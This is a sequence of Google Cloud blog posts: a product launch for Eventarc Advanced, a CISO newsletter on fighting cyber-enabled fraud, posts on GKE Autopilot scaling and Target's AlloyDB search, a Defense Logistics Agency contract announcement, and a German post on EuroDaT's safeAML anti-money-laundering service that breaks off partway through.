Modern application development requires organizations to invest not only in scale but also in simplification and central governance. This means more than message routing; it requires a simple, unified messaging platform that can intelligently filter, transform, and govern the flow of information in real-time, taming complexity all in one place.
Today, we are excited to announce the general availability of Eventarc Advanced, a unified, serverless eventing platform that goes beyond simple routing by combining real-time filtering, transformation, management, and delivery in one place — for a complex, multi-source event-driven architecture.
Evolving Eventarc to handle complexity
Eventarc Advanced is an evolution of Eventarc Standard and offers out-of-the-box integration patterns to simplify your eventing needs.
With Eventarc Advanced, organizations can
Integrate existing services using Publish API and leverage Google Cloud events to build sophisticated event-driven applications.
Centrally manage, secure, and observe the flow of messages across services with support for per-message fine-grained access control.
Intelligently route messages to appropriate destinations based on flexible message criteria.
Transform and convert events in real-time, with support for multiple payload formats and built-in capability to transform event attributes.
Publish to Google Cloud services using HTTP binding.
With Eventarc Advanced, you can build sophisticated eventing systems. In contrast, Eventarc Standard is best for simple one-to-one eventing needs involving Google Cloud events (comparison).
Eventarc Advanced’s key technical features include:
Publish API to ingest custom and third-party messages using CloudEvents format (details).
Message bus that acts as the central nervous system of your event-driven architecture, providing centralized observability, security and management. Message bus is based on Envoy and uses the policy engine of Cloud Load Balancers and Cloud Service Mesh.
Your existing systems can publish messages to a central message bus that can be intelligently routed to appropriate consumers based on flexible criteria. The message bus simplifies event management and reduces operational overhead.
You can gain insights into your message flows with centralized monitoring, logging, and tracing capabilities. Logs are captured in Cloud Logging, providing detailed information about event processing and errors.
Out-of-the-box event mediation capabilities to adapt messages on the fly without modifying your source or destination services, and to handle different events through support for multiple payload formats (Avro, JSON, Protobuf) and built-in capability to transform event attributes.
Eventarc Advanced incorporates error-handling by offering reliable event delivery and graceful recovery from transient failures.
Empowering developers and operators
We designed Eventarc Advanced to cater to the needs of both developers and operators:
“Simplicity” for developers: Focus on building your core application features, not on complex event routing logic. Eventarc Advanced provides a unified API and a consistent experience, letting you build decoupled, reliable, and scalable services including real-time transformations.
“Centralized governance” for platform operators: Simplify the setup and management of your eventing infrastructure. Centralized governance across projects / teams, plus monitoring and logging make it easier to identify and resolve issues, reducing operational overhead.
How Eventarc Advanced works
Imagine an order processing system where orders are created, payments are processed, and items are shipped. Each action is an “event,” and in a complex system, managing this flow can be challenging. This is where Eventarc Advanced comes in. It provides a centralized way to manage, observe, and route all your application’s events. Let’s explore how it works.
Set up your message bus At the heart of Eventarc Advanced is a message bus that acts as the central nervous system for your event-driven application. Every event, regardless of its origin, is sent to the message bus to be analyzed and routed. This central hub is where you can define security policies, controlling exactly who can send events and what kind are allowed.
In our example, you would create a message bus to receive all order-related events. Whether an order is newly created, its payment is confirmed, or its status changes to “shipped,” the events land here.
Connect your event sources Next, connect your sources that generate order events. Event sources are the services and applications that generate events and feed them into your message bus. Eventarc Advanced makes this easy, supporting a wide range of sources, including:
Google API events
External apps or custom systems via Publish API
In our example, the event source could be a custom service using the Publish API. Every time a new order is saved or an existing one is updated, it automatically sends an event to your message bus.
Configure pipelines and destinations This is another area where Eventarc Advanced shines. With events flowing into your message bus, you can configure pipelines to intelligently route them to the correct destinations, allowing you to filter, transform, and direct events with precision.
In the above example,
New order notification: You can set up a filter that looks for events with status: “new”. This pipeline routes these events to a notification service that sends an order confirmation email to the customer.
Fraud detection: For high-value orders (e.g., amount > $1000), you can apply a transformation and route it to a specialized fraud detection service for analysis.
Unlocking new possibilities
Eventarc Advanced opens up new possibilities for your applications and workflows:
Large-scale application integration: Connect numerous services and agents, enabling them to communicate asynchronously and reliably, even across different event formats and schemas.
Event streaming for AI and analytics: Handle the influx of data from IoT devices and AI workloads by filtering and transforming them before feeding them into your analytics pipelines.
Hybrid and multi-cloud deployments: Extend your event-driven architectures beyond Google Cloud, integrating with on-premises systems and other cloud providers.
What’s next
As today’s applications become increasingly agentic, distributed and data-driven, the need for efficient and secure event orchestration is more critical than ever. With upcoming native support for Service Extensions to insert custom code into the data path and services like Model Armor, Eventarc Advanced’s message bus provides security and networking controls for agent communications.
Eventarc Advanced is available today. To learn more about Eventarc Advanced, see the documentation. To learn more about event-driven architectures, visit our Architecture Center based on Google Cloud best practices. Get ready to take your event-driven architectures to the next level!
Welcome to the second Cloud CISO Perspectives for August 2025. Today, David Stone and Marina Kaganovich, from our Office of the CISO, talk about the serious risk of cyber-enabled fraud — and how CISOs and boards can help stop it.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9735660160>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
How CISOs and boards can help fight cyber-enabled fraud
By David Stone, director, Office of the CISO, and Marina Kaganovich, executive trust lead, Office of the CISO
David Stone, director, Office of the CISO
Cybercriminals are using IT to rapidly scale fraudulent activity — and directly challenge an organization’s health and reputation. Known as cyber-enabled fraud (CEF), it’s a major revenue stream for organized crime, making it a top concern for board members, CISOs, and other executive leaders.
The financial toll of cyber-enabled fraud on businesses is staggering. The FBI noted that cyber-enabled fraud cost $13.7 billion in 2024, a nearly 10% increase from 2023, and represented 83% of all financial losses reported to the FBI in 2024.
Marina Kaganovich, executive trust lead, Office of the CISO
“Regions that are highly cashless and digital-based” are more vulnerable to the money-laundering risks of cyber-enabled fraud,” said the international Financial Action Task Force in 2023. “CEF can have [a] significant and crippling financial impact on victims. But the impact is not limited to monetary losses; it can have devastating social and economic implications
Tactics used in cyber-enabled fraud, including “ransomware, phishing, online scams, computer intrusion, and business email compromise,” are frequently perceived as posing “high” or “very high” threats, according to Interpol’s 2022 Global Crime Trend Report.
Cyber-enabled fraud drives a complex and dangerous ecosystem, where illicit activities intersect and fuel each other in a vicious cycle. For example, the link between cybercrime and human trafficking is becoming more pronounced, with criminal networks often using the funds obtained through cyber-enabled fraud to fuel operations where trafficked workers are forced to perpetrate “romance baiting” cryptocurrency scams.
At Google Cloud’s Office of the CISO, we believe that a strategic shift toward a proactive, preventive mindset is crucial to helping organizations take stronger action to address cyber-enabled fraud. That starts with a better understanding of the common fraudulent activities that can threaten your business, such as impersonation, phishing, and account takeovers.
Disrupting this ecosystem is a top reason for combating cyber-enabled fraud, yet most efforts to do so are currently fragmented because data, systems, and organizational structures have been siloed. We often see organizations use a myriad of tools and platforms across divisions and departments, which results in inconsistent rule application.
Those weaknesses can limit visibility and hinder comprehensive detection and prevention efforts. Fraud programs in their current state are time-consuming and resource-intensive, and can feel like an endless game of whack-a-mole for the folks on the ground.
At Google Cloud’s Office of the CISO, we believe that a strategic shift toward a proactive, preventive mindset is crucial to helping organizations take stronger action to address cyber-enabled fraud. That starts with a better understanding of the common fraudulent activities that can threaten your business, such as impersonation, phishing, and account takeovers.
From there, it’s essential to build a scalable risk assessment using a consistent approach. We recommend using the Financial Services Information Sharing and Analysis Center’s Cyber Fraud Prevention Framework, which ensures a common lexicon and a unified approach across your entire enterprise. The final piece involves meticulously mapping out the specific workflows where fraudulent activity is most likely to occur.
By categorizing these activities into distinct phases, you can identify the exact points where controls can be implemented, breaking the chain before a threat can escalate into a breach.
In parallel, consider the types of fraud-prevention capabilities that may already be available to support your fraud prevention efforts. Our recent paper on tackling scams and fraud together describes Google Cloud’s efforts in this space, some of which are highlighted below.
Remove scams and fraudulent links, including phishing and executive impersonation, from Google Ads and Google Workspace services through the Financial Services Priority Flagger Program.
Combating cyber-enabled fraud is a key task that CISOs and boards of directors can collaborate on to ensure alignment with executive leadership, especially given the financial and reputational risks. Regular dialogue between boards and CISOs can help build a unified, enterprise-wide strategy that moves from siloed departments and disparate tools to a proactive defense model.
Boardrooms should hear regularly from CISOs and other security experts who understand the intersection of fraud and cybersecurity, and the issues at stake for security practitioners and risk managers. We also recommend that boards should regularly ask CISOs questions about the threat landscape and the fraud risks that the business faces, and how best to mitigate those risks.
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9735660760>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
Security Summit 2025: Enabling defenders, securing AI innovation: At Security Summit 2025, we’re sharing new capabilities to help secure your AI initiatives, and to help you use AI to make your organization more secure. Read more.
Introducing Cloud HSM as an encryption key service for Workspace CSE: To help highly-regulated organizations meet their encryption key service obligation, we are now offering Cloud HSM for Google Workspace CSE customers. Read more.
From silos to synergy: New Compliance Manager, now in preview: Google Cloud Compliance Manager, now in preview, can help simplify and enhance how organizations manage security, privacy, and compliance in the cloud. Read more.
Going beyond DSPM to protect your data in the cloud, now in preview: Our new DSPM offering, now in preview, provides end-to-end governance for data security, privacy, and compliance. Here’s how it can help you. Read more.
Google named a Leader in IDC MarketScape: Worldwide Incident Response 2025 Vendor Assessment: Mandiant, a core part of Google Cloud Security, can empower organizations to navigate critical moments, prepare for future threats, build confidence, and advance their cyber defense programs. Read more.
A fuzzy escape: Vulnerability research on hypervisors: Follow the Cloud Vulnerability Research (CVR) team on their journey to find a virtual machine escape bug. Read more.
Please visit the Google Cloud blog for more security stories published this month.
aside_block
<ListValue: [StructValue([(‘title’, ‘Fact of the month’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9735660040>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-adding-new-layered-protections-to-2fa/’), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
Threat Intelligence news
PRC-nexus espionage hijacks web traffic to target diplomats: Google Threat Intelligence Group (GTIG) has identified a complex, multifaceted espionage campaign targeting diplomats in Southeast Asia and other entities globally, that we attribute to the People’s Republic of China (PRC)-nexus threat actor UNC6384. Read more.
Analyzing the CORNFLAKE.V3 backdoor: Mandiant Threat Defense has detailed a financially-motivated operation where threat actors are working together. One threat actor, UNC5518, has been using the ClickFix technique to gain initial access, and another threat actor, UNC5774, has deployed the CORNFLAKE.V3 backdoor to deploy payloads. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
Cyber-resiliency for the rest of us: Errol Weiss, chief security officer, Health-ISAC, joins hosts Anton Chuvakin and Tim Peacock to chat about making organizations more digitally resilient, shifting from a cybersecurity perspective to one that’s broader, and how to increase resilience given tough budget constraints. Listen here.
Linux security, and the detection and response disconnect: Craig Rowland, founder and CEO, Sandfly Security, joins Anton and Tim to discuss the most significant security blind spots on Linux, and the biggest operational hurdles teams face when trying to conduct incident response across distributed Linux environments. Listen here.
Defender’s Advantage: How cybercriminals view AI tools: Michelle Cantos, GTIG senior analyst, joins host Luke McNamara to discuss the latest trends and use cases for illicit AI tools being sold by threat actors in underground marketplaces. Listen here.
Behind the Binary: Scaling bug bounty programs: Host Josh Stroschein is joined by Jared DeMott to discuss managing bug bounty programs at scale and what goes into a good bug report. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
The promise of Google Kubernetes Engine (GKE) is the power of Kubernetes with ease of management, including planning and creating clusters, deploying and managing applications, configuring networking, ensuring security, and scaling workloads. However, when it comes to autoscaling workloads, customers tell us the fully managed mode of operation, GKE Autopilot, hasn’t always delivered the speed and efficiency they need. That’s because autoscaling a Kubernetes cluster involves creating and adding new nodes, which can sometimes take several minutes. That’s just not good enough for high-volume, fast-scale applications.
Enter the container-optimized compute platform for GKE Autopilot, a completely reimagined autoscaling stack for GKE that we introduced earlier this year. In this blog, we take a deeper look at autoscaling in GKE Autopilot, and how to start using the new container-optimized compute platform for your workloads today.
Understanding GKE Autopilot and its scaling challenges
With the fully managed version of Kubernetes, GKE Autopilot users are primarily responsible for their applications, while GKE takes on the heavy lifting of managing nodes and nodepools, creating new nodes, and scaling applications. With traditional Autopilot, if an application needed to scale quickly, GKE first needed to provision new nodes onto which the application could scale, which sometimes took several minutes.
To circumvent this, users often employed techniques like “balloon pods” — creating dummy pods with low priority to hold onto nodes; this helped ensure immediate capacity for demanding scaling use cases. However, this approach is costly, as it involves holding onto actively unused resources, and is also difficult to maintain.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9751f0c820>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Introducing the container-optimized compute platform
We developed the container-optimized compute platform with a clear mission: to provide you with near-real-time, vertically and horizontally scalable compute capacity precisely when you need it, at optimal price and performance. We achieved this through a fundamental redesign of GKE’s underlying compute stack.
The container-optimized compute platform runs GKE Autopilot nodes on a new family of virtual machines that can be dynamically resized while they are running, from fractions of a CPU, all without disrupting workloads. To improve the speed of scaling and resizing, GKE clusters now also maintain a pool of dedicated pre-provisioned compute capacity that can be automatically allocated for workloads in response to increased resource demands. More importantly, given that with GKE Autopilot, you only pay for the compute capacity that you requested, this pre-provisioned capacity does not impact your bill.
The result is a flexible compute that provides capacity where and when it’s required. Key improvements include:
Up to 7x faster pod scheduling time compared to clusters without container-optimized compute
Significantly improved application response times for applications with autoscaling enabled
Introduction of in-place pod resize in Kubernetes 1.33, allowing for pod resizing without disruption
The container-optimized compute platform also includes pre-enabled high-performance Horizontal Pod Autoscaler (HPA) profile, which delivers:
Highly consistent horizontal scaling reaction times
Up to 3x faster HPA calculations
Higher resolution metrics, leading to improved scheduling decisions
Accelerated performance for up to 1000 HPA objects
All these features are now available out of the box in GKE Autopilot 1.32 or later.
The power of the new platform is evident in demonstrations where replica counts are rapidly scaled, showcasing how quickly new pods get scheduled.
How to leverage container-optimized compute
To benefit from these improvements in GKE Autopilot, simply create a new GKE Autopilot cluster based on GKE Autopilot 1.32 or later.
If your existing cluster is on an older version, upgrade it to 1.32 or newer to benefit from container-optimized compute platform’s new features offered.
To optimize performance, we recommend that you utilize the general purpose compute class for your workload. While the container-optimized compute platform supports various types of workloads, it works best with services that require gradual scaling and small (2 CPU or less) resource requests like web applications.
While the container-optimized compute platform is versatile, it is not currently suitable for specific deployment types:
One-pod-per-node deployments, such as anti-affinity situations
Batch workloads
The container-optimized compute platform marks a significant leap forward in improving application autoscaling within GKE and will unlock more capabilities in the future. We encourage you to try it out today in GKE Autopilot.
Editor’s note:Target set out to modernize its digital search experience to better match guest expectations and support more intuitive discovery across millions of products. To meet that challenge, they rebuilt their platform with hybrid search powered by filtered vector queries and AlloyDB AI. The result: a faster, smarter, more resilient search experience that’s already improved product discovery relevance by 20% and delivered measurable gains in performance and guest satisfaction.
The search bar on Target.com is often the first step in a guest’s shopping journey. It’s where curiosity meets convenience and where Target has the opportunity to turn a simple query into a personalized, relevant, and seamless shopping experience.
Our Search Engineering team takes that responsibility seriously. We wanted to make it easier for every guest to find exactly what they’re looking for — and maybe even something they didn’t know they needed.
That meant rethinking search from the ground up.
We set out to improve result relevance, support long-tail discovery, reduce dead ends, and deliver more intuitive, personalized results.
As we pushed the boundaries of personalization and scale, we began reevaluating the systems that power our digital experience. That journey led us to reimagine search using hybrid techniques that bring together traditional and semantic methods and are backed by a powerful new foundation built with AlloyDB AI.
Hybrid search is where carts meet context
Retail search is hard. You’re matching guest expectations, which can sometimes be expressed in vague language, against an ever-changing catalog of millions of products. Now that generative AI is reshaping how customers engage with brands, we know traditional keyword search isn’t enough.
That’s why we built a hybrid search platform combining classic keyword matching with semantic search powered by vector embeddings. It’s the best of both worlds: exact lexical matches for precision and contextual meaning for relevance. But hybrid search also introduces technical challenges, especially when it comes to performance at scale.
Fig. 1: Hybrid Search blends two powerful approaches to help guests find the most relevant results
Choosing the right database for AI-powered retrieval
Our goals were to surface semantically relevant results for natural language queries, apply structured filters like price, brand, or availability, and deliver fast, personalized search results even during peak usage times. So we needed a database that could power our next-generation hybrid search platform by supporting real-time, filtered vector search across a massive product catalog, while maintaining millisecond-level latency even during peak demand.
We did this by using a multi-index design that yields highly relevant results by fusing the flexibility of semantic search with the precision of keyword-based retrieval. In addition to retrieval, we developed a multi-channel relevance framework that dynamically modifies ranking tactics in response to contextual cues like product novelty, seasonality, personalization and other relevance signals.
Fig. 2: High level architecture of the services benign built within Target
We had been using a different database for similar workloads, but it required significant tuning to handle filtered approximate nearest neighbor (ANN) search at scale. As our ambitions grew, it became clear we needed a more flexible, scalable backend that also provided the highest quality results with the lowest latency. We took this problem to Google to explore the latest advancements in this area, and of course, Google is no stranger to search!
AlloyDB for PostgreSQL stood out, as Google Cloud had infused the underlying techniques from Google.com search into the product to enable any organization to build high quality experiences at scale. It also offered PostgreSQL compatibility with integrated vector search, the ScaNN index, and native SQL filtering in a fully managed service. That combination allowed us to consolidate our stack, simplify our architecture, and accelerate development. AlloyDB now sits at the core of our search system to power low-latency hybrid retrieval that scales smoothly across seasonal surges and for millions of guest search sessions every day while ensuring we serve more relevant results.
aside_block
<ListValue: [StructValue([(‘title’, ‘Build smarter with Google Cloud databases!’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9751ae87c0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Filtered vector search at scale
Guests often search for things like “eco-friendly water bottles under $20” or “winter jackets for toddlers.” These queries blend semantic nuance with structured constraints like price, category, brand, sizes or store availability. With AlloyDB, we can run these hybrid queries that combine vector similarity and SQL filters easily without sacrificing speed or relevance.
up to 10x faster execution compared to our previous stack
product discovery relevance improved by 20%
halved the number of “no results” queries
These improvements have extended deeper into our operations. We’ve reduced vector query response times by 60%, which resulted in a significant improvement in the guest experience. During high-traffic events, AlloyDB has consistently delivered more than 99.99% uptime, providing us with the confidence that our digital storefront can keep pace with demand when it matters most. Since search is an external –facing, mission-critical service, we deploy multiple AlloyDB clusters across multiple regions, allowing us to effectively achieve even higher effective reliability. These reliability gains have also led to fewer operational incidents, so our engineering teams can devote more time to experimentation and feature delivery.
Fig 3: AlloyDB AI helps Target combine structured and unstructured data with SQL and Vector search. For example, this improved search experience now delivers more seasonally relevant styles (ie. Long Sleeves) on Page One!
AlloyDB’s cloud-first architecture and features give us the flexibility to handle millions of filtered vector queries per day and support thousands of concurrent users – no need to overprovision or compromise performance.
Building smarter search with AlloyDB AI
What’s exciting is how quickly we can iterate. AlloyDB’s managed infrastructure and PostgreSQL compatibility let us move fast and experiment with new ranking models, seasonal logic, and even AI-native features like:
Semantic ranking in SQL: We can prioritize search results based on relevance to the query intent.
Natural language support: Our future interfaces will let guests search the way they speak – no more rigid filters or dropdowns.
AlloyDB features state-of-the-art models and natural language in addition to the state-of-the-art ScaNN vector index. Google’s commitment and leadership in AI infused in AlloyDB has given us the confidence to evolve our service together with pace of the overall AI & data landscape.
The next aisle over: What’s ahead for Target
Search at Target is evolving into something far more dynamic – an intelligent, multimodal layer that helps guests connect with what they need, when and how they need it. As our guests engage across devices, languages, and formats, we want their experience to feel seamless and smart.
With AlloyDB AI and Google Cloud’s rapidly evolving data and AI stack, we’re confident in our ability to stay ahead of guest expectations and deliver more personalized, delightful shopping moments every day.
Note from Amit Ganesh, VP of Engineering at Google Cloud :
Target’s journey is a powerful example of how enterprises are already transforming search experiences using AlloyDB AI. As Vishal described, filtered vector search is unlocking new levels of relevance and scale. At Google Cloud, we’re continuing to expand the capabilities of AlloyDB AI to support even more intelligent, agent-driven, multimodal applications. Here’s what’s new:
Agentspace integration: Developers can now build AI agents that query AlloyDB in real time, combining structured data with natural language reasoning.
AlloyDB natural language: Applications can securely query structured data using plain English (or French, or 250+ other languages) backed by interactive disambiguation and strong privacy controls.
Enhanced vector support: With AlloyDB’s ScaNN index and adaptive query filtering, vector search with filters now performs up to 10x faster.
AI queryengine: SQL developers can use natural language expressions to embed Gemini model reasoning directly into queries
Three new models: AlloyDB AI now supports Gemini’s text embedding model, a cross-attention reranker, and a multimodal model that brings vision and text into a shared vector space.
These capabilities are designed to accelerate innovation – whether you’re improving product discovery like Target or building new agent-based interfaces from the ground up.
The backbone of U.S. national defense is a resilient, intelligent, and secure supply chain. The Defense Logistics Agency (DLA) manages this critical mission, overseeing the end-to-end global supply chain for all five military services, military commands, and a host of federal and international partners.
Today, Google Public Sector is proud to announce a new $48 million contract with the DLA to support its vital mission. Through a DLA Enterprise Platform agreement, Google Public Sector will provide a modern, secure, and AI-ready cloud foundation to enhance DLA’s operational capabilities and provide meaningful cost savings. This marks a pivotal moment for the DoD – away from legacy government clouds and onto a modern, born-in-the-cloud provider that is also a DoD-accredited commercial cloud environment.
The Need for a Modern Foundation
To effectively manage a supply chain of global scale and complexity, DLA requires access to the most advanced digital tools available. Previously, DLA, like many other federal agencies and organizations across the federal government, were restricted to a “GovCloud” environment, which are isolated and often less-reliable versions of commercial clouds. These limitations created challenges in data visualization, interoperability between systems, and network resiliency, while also contributing to high infrastructure and support costs.
The driver for change was clear: a need for a modern, scalable, and secure platform to ensure mission success into the future. By migrating to Google Cloud, DLA will be able to harness modern cloud best practices combined with Google’s highly performant and resilient cloud infrastructure.
A Modern, Secure, and Intelligent Platform
DLA leadership embraced a forward-thinking approach to modernization, partnering with Google Public Sector to deploy the DLA Enterprise Platform. This multi-phased approach provides a secure, intelligent foundation for transformation, delivering both immediate value and a long-term modernization roadmap.
The initial phase involved migrating DLA’s key infrastructure and data onto Google Cloud which will provide DLA with an integrated suite of services to unlock powerful data analytics and AI capabilities—turning vast logistics data into actionable intelligence with tools like BigQuery, Looker, and Vertex AI Platform. Critically, the platform is protected end-to-end by Google’s secure-by-design infrastructure and leading threat intelligence, ensuring DLA’s mission is defended against sophisticated cyber threats.
By leveraging Google Cloud, DLA will be empowered to:
Optimize logistics and reduce costs through the migration of business planning resources to a more efficient, born-in-the-cloud infrastructure.
Enhance decision-making with advanced AI/ML for warehouse modernization and transportation management.
Improve collaboration through a more connected and interoperable technology ecosystem.
Strengthen security by defending against advanced cyber threats with Mandiant’s expertise and Google Threat Intelligence.
Google Public Sector’s partnership with DLA builds on the momentum of its recent $200 million-ceiling contract award by the DoD’s Chief Digital and Artificial Intelligence Office (CDAO) to accelerate AI and cloud capabilities across the agency. We are honored to support DLA’s mission as it takes this bold step into the future of defense logistics.
Register to attend our Google Public Sector Summit taking place on Oct. 29, 2025, in Washington, D.C. Designed for government leaders and IT professionals, 1,000+ attendees will delve into the intersection of AI and security with agency and industry experts, and get hands-on with Google’s latest AI technologies.
Ein Beitrag von Dr. Alexander Alldridge, Geschäftsführer von EuroDaT
Geldwäschebekämpfung ist Teamarbeit. Banken, Regierungen und Technologiepartner müssen eng zusammenarbeiten, um kriminelle Netzwerke effektiv aufzudecken. Diese Herausforderung ist im streng regulierten Finanzsektor besonders komplex: Wie funktioniert Datenabgleich, wenn die Daten, um die es geht, hochsensibel sind? In diesem Blogbeitrag erklärt Dr. Alexander Alldridge, Geschäftsführer von EuroDaT, welche Rolle ein Datentreuhänder dabei spielen kann – und wie EuroDaT mit Lösungen von Google Cloud eine skalierbare, DSGVO-konforme Infrastruktur für genau diesen Zweck aufgebaut hat.
Wenn eine Bank eine verdächtige Buchung bemerkt, beginnt ein sensibler Abstimmungsprozess. Um mögliche Geldflüsse nachzuverfolgen, bittet sie andere Banken um Informationen zu bestimmten Transaktionen oder Konten. Aktuell geschieht das meist telefonisch – nicht, weil es keine digitalen Alternativen gäbe, sondern weil die Weitergabe sensibler Finanzdaten wie IBANs oder Kontobewegungen nur unter sehr engen rechtlichen Vorgaben erlaubt ist.
Das Hin und Her per Telefon ist nicht nur mühsam, sondern auch fehleranfällig. Deutlich schneller und sicherer wäre ein digitaler Datenabgleich, der nur berechtigten Stellen Zugriff auf genau die Informationen gibt, die sie im konkreten Verdachtsfall benötigen.
Hier bei EuroDaT, einer Tochtergesellschaft des Landes Hessen, bieten wir genau das: Als Europas erster transaktionsbasierter Datentreuhänder ermöglichen wir einen kontrollierten, anlassbezogenen Austausch sensibler Finanzdaten, der vertrauliche Informationen schützt und alle gesetzlichen Vorgaben erfüllt.
safeAML: Ein neuer Weg für den Datenaustausch im Finanzsektor
Mit safeAML haben wir in Zusammenarbeit mit der Commerzbank, der Deutschen Bank und N26 ein System entwickelt, das den Informationsaustausch zwischen Finanzinstituten digitalisiert. Statt aufwendig andere Institute abzutelefonieren, kann künftig jede Bank selbst die relevanten Daten von anderen Banken hinzuziehen, um auffällige Transaktionen besser einordnen zu können.
Der Datenaustausch läuft dabei kontrolliert und datenschutzkonform ab: Die Daten werden pseudonymisiert verarbeitet und so weitergegeben, dass nur die anfragende Bank sie am Ende wieder zuordnen kann. Wir bei EuroDaT haben als Datentreuhänder zu keinem Zeitpunkt Zugriff auf personenbezogene Inhalte.
safeAML Anwendung
Höchste Sicherheits- und Compliance-Standards mit Google Cloud
safeAML ist eine Cloud-native Anwendung, wird also vollständig in der Cloud entwickelt und betrieben. Dafür braucht es eine Infrastruktur, die nicht nur technisch leistungsfähig ist, sondern auch die strengen Vorgaben im Finanzsektor erfüllt – von der DSGVO bis zu branchenspezifischen Sicherheits- und Cyber-Resilienz-Anforderungen. Google Cloud bietet dafür eine starke Basis, weil das Google Cloud-Team technisch und vertraglich schon früh die passenden Grundlagen für solche sensiblen Anwendungsfälle gelegt hat. Für uns war das ein entscheidender Vorteil gegenüber anderen Anbietern.
Unsere gesamte Infrastruktur ist auf Google Kubernetes Engine (GKE) aufgebaut. Darüber richten wir sichere, isolierte Umgebungen ein, in denen jede Anfrage nachvollziehbar und getrennt von anderen verarbeitet werden kann. Alle technischen Ressourcen, darunter auch unsere Virtual Private Clouds (VPCs), sind in der Google-Cloud-Umgebung über Infrastruktur als Code definiert. Das bedeutet: Die gesamte Infrastruktur von EuroDaT wird automatisiert und wiederholbar aufgebaut, inklusive der Regeln dafür, welche Daten wohin fließen dürfen.
Diese transparente, einfach reproduzierbare Architektur hilft uns auch dabei, die strengen Compliance-Anforderungen im Finanzsektor zu erfüllen: Wir können jederzeit belegen, dass sicherheitsrelevante Vorgaben automatisch umgesetzt und überprüft werden.
Banken nutzen safeAML für schnellere Verdachtsprüfung
safeAML ist inzwischen bei den ersten deutschen Banken testweise im Einsatz, um verdächtige Transaktionen schneller und besser einordnen zu können. Anstatt wie gewohnt zum Telefon greifen zu müssen, können Ermittler*innen jetzt gezielt ergänzende Informationen von anderen Instituten einholen, ohne dabei sensible Daten offenzulegen.
Das beschleunigt nicht nur die Prüfung, sondern reduziert auch Fehlalarme, die bisher viel Zeit und Kapazitäten gebunden haben. Die Meldung, ob ein Geldwäscheverdacht vorliegt, bleibt dabei weiterhin eine menschliche Einzelfallentscheidung, wie es das deutsche Recht verlangt.
Dass Banken über safeAML erstmals kontrolliert Daten austauschen können, ist bereits ein großer Schritt für die Geldwäschebekämpfung in Deutschland. Wir stehen aber noch am Anfang: Jetzt geht es darum, mehr Banken einzubinden, die Vernetzung national und international auszuweiten und den Prozess so unkompliziert wie möglich zu machen. Denn je mehr Institute mitmachen, desto besser können wir ein vollständiges Bild verdächtiger Geldflüsse zeichnen. Die neue Datenbasis kann künftig auch dabei helfen, Verdachtsfälle besser einzuordnen und fundierter zu bewerten.
Nachhaltiger Datenschutz: Sicherer Austausch von ESG-Daten
Unsere Lösung ist aber nicht auf den Finanzbereich beschränkt. Als Datentreuhänder können wir das Grundprinzip, sensible Daten nur gezielt und kontrolliert zwischen dazu berechtigten Parteien zugänglich zu machen, auch auf viele andere Bereiche übertragen. Wir arbeiten dabei immer mit Partnern zusammen, die ihre Anwendungsideen auf EuroDaT umsetzen, und bleiben als Datentreuhänder selbst neutral.
Leistungsangebot EuroDaT
Ein aktuelles Beispiel sind ESG-Daten: Nicht nur große Firmen, sondern auch kleine und mittlere Unternehmen stehen zunehmend unter Druck, Nachhaltigkeitskennzahlen offenzulegen – sei es wegen neuer gesetzlicher Vorgaben oder weil Geschäftspartner wie Banken und Versicherer sie einfordern.
Gerade für kleinere Firmen ist es schwierig, diesen Anforderungen gerecht zu werden. Sie haben oft nicht die nötigen Strukturen oder Ressourcen, um ESG-Daten standardisiert bereitzustellen, und möchten sensible Informationen wie Verbrauchsdaten verständlicherweise auch nicht einfach öffentlich machen.
Hier kommt EuroDaT ins Spiel: Wir sorgen als vertrauenswürdige Zwischenstelle dafür, dass Nachhaltigkeitsdaten sicher weitergegeben werden, ohne dass Unternehmen die Kontrolle darüber verlieren. Mit dem Deutschen Nachhaltigkeitskodex (DNK) führen wir aktuell Gespräche zu einer Lösung, die kleinen Firmen das Übermitteln von ESG-Daten an Banken, Versicherungen und Investor*innen über EuroDaT als Datentreuhänder erleichtern kann.
Forschung im Gesundheitssektor: Sensible Daten, sichere Erkenntnisse
Auch im Gesundheitssektor sehen wir großes Potenzial für unsere Technologie. Hier geht es natürlich um besonders sensible Daten, die nur unter strengen Auflagen verarbeitet werden dürfen. Trotzdem gibt es viele Fälle, in denen Gesundheitsdaten zusammengeführt werden müssen – etwa für die Grundlagenforschung, die Ausgestaltung klinischer Studien und politische Entscheidungen.
